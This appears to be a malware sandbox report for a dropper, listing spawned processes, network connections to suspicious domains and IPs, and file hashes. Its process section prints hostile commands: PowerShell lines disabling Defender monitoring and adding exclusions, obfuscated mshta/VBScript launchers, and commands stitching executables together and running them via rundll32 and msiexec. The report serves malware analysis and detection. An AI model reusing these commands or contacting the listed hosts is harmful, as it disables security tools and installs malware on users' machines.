PID 540 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe
PID 540 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe
PID 5084 wrote to memory of 3964 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe
PID 5084 wrote to memory of 3964 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe
PID 5084 wrote to memory of 3964 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe
PID 996 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe
PID 996 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe
PID 996 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe
PID 4912 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe
PID 4912 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe
PID 4912 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe
PID 4296 wrote to memory of 4152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe

Processes

C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe

"C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe

Sat0663b341399ee.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe

Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe

Sat0647140c100d63.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe

Sat0619212f22dd7.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe

Sat0618d93ac2c5c.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06ebc37d1c94352.exe

Sat06ebc37d1c94352.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe

Sat06f5ed0e3bb24.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat060fd7e42d2.exe

Sat060fd7e42d2.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe

Sat0675f75df01bdb.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3952 -ip 3952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1428 -ip 1428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 580

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1028 -ip 1028

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 360

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 840

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1028 -ip 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 844

C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe

H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "Sat06f5ed0e3bb24.exe" /F

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5"" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1028 -ip 1028

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Sat0663b341399ee.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 840

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1028 -ip 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 944

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE ( CREAteobjEcT ( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " , 0 ,True ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1028 -ip 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 972

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 +FDKD47Ef.I1+ U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1028 -ip 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 992

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1028 -ip 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 844

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1028 -ip 1028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 932

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Sat0675f75df01bdb.exe" /f

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 gazrxlog.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 whealclothing.xyz udp
US 8.8.8.8:53 my-all-group.bar udp
US 8.8.8.8:53 m525-blockchain31432.bar udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
N/A 127.0.0.1:65269 tcp
N/A 127.0.0.1:65271 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 c93901703b1d556d494f7a31ffb04720
SHA1 d14e2dc239ac85e6020f1fc4c035f7d2ea72d262
SHA256 0d5b2226f4199a3891ec836c5b54023595b4aa06d4a80e816a8d6545a0bb3631
SHA512 3e31e881d7b7c74baa5ea0e8d97f86dfc6feb06ec7061f30891b7736477f2888fdb58ccaa4d8ea764249191c89e5897954515b6bfdfe6a45d51640c63c20e900

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe

MD5 a979670adefae9ab376382f3229f3f28
SHA1 5b5b75a789e46a2f8ac02fba3d895fa968387c9b
SHA256 a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040
SHA512 f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3952-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3952-65-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3952-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3952-75-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3952-74-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3952-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3952-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1084-76-0x0000000002670000-0x00000000026A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06ebc37d1c94352.exe

MD5 e9133ca1a95483a3331d0f336685302d
SHA1 48c1348e20b26be8227ed63a1db0f13716f1b8e3
SHA256 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b
SHA512 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe

MD5 854ea0bc0602795b95da3be8257c530f
SHA1 f243a71edc902ed91d0f990630a73d0d01828c73
SHA256 c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e
SHA512 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe

MD5 0e05650d436fd4d92775cd4f65973870
SHA1 4d13aaa6b18630d0c89400cee5933130f03bd762
SHA256 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16
SHA512 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe

MD5 dd2fdd69b9db1cf5764dcfd429a1cf5e
SHA1 c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8
SHA256 d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe
SHA512 c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat060fd7e42d2.exe

MD5 29c9683aa48f1e3a29168f6b0ff3be04
SHA1 f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f
SHA256 e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901
SHA512 a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe

MD5 10e13cc7b41d162ab578256f27d297b1
SHA1 1d938b7e6e99951d9b8139f078483539120021e6
SHA256 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9
SHA512 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe

MD5 1cc8a64b178076dca421fedc3a248a56
SHA1 db8ed444965577dfb6db4f92ddd8d96a157ddea5
SHA256 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345
SHA512 c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff

memory/1084-77-0x0000000004EF0000-0x0000000005518000-memory.dmp

memory/3952-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3952-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3952-68-0x000000006B440000-0x000000006B4CF000-memory.dmp

